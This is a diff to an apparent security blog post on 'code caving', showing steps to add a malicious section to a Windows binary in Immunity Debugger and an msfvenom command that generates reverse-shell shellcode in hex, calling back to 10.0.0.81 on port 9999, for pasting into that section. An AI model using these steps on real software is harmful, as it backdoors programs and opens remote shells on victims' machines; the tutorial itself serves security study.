asdyxcyxc/FULLSHADE.github.io/_posts/2020-03-06-code-caving.md

 Now you also want to edit the new section in Immunity and add a `PUSHFD` to the start of your malicious new section.
 Assemble it when done.

-Now you can generate your msfvenom payload, use a EXITFUN=seh to ensure it handles proper exiting to add to the stability and reliability of your shell.
+Now you can generate your msfvenom payload, use a `EXITFUNC=seh` to ensure it handles proper exiting to add to the stability and reliability of your shell.
 Generate it in hex format you you can now copy past this into Immunity Debugger into your new malicious section.

 ```
 └─▪ ./msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.81 LPORT=9999 -f hex EXITFUNC=seh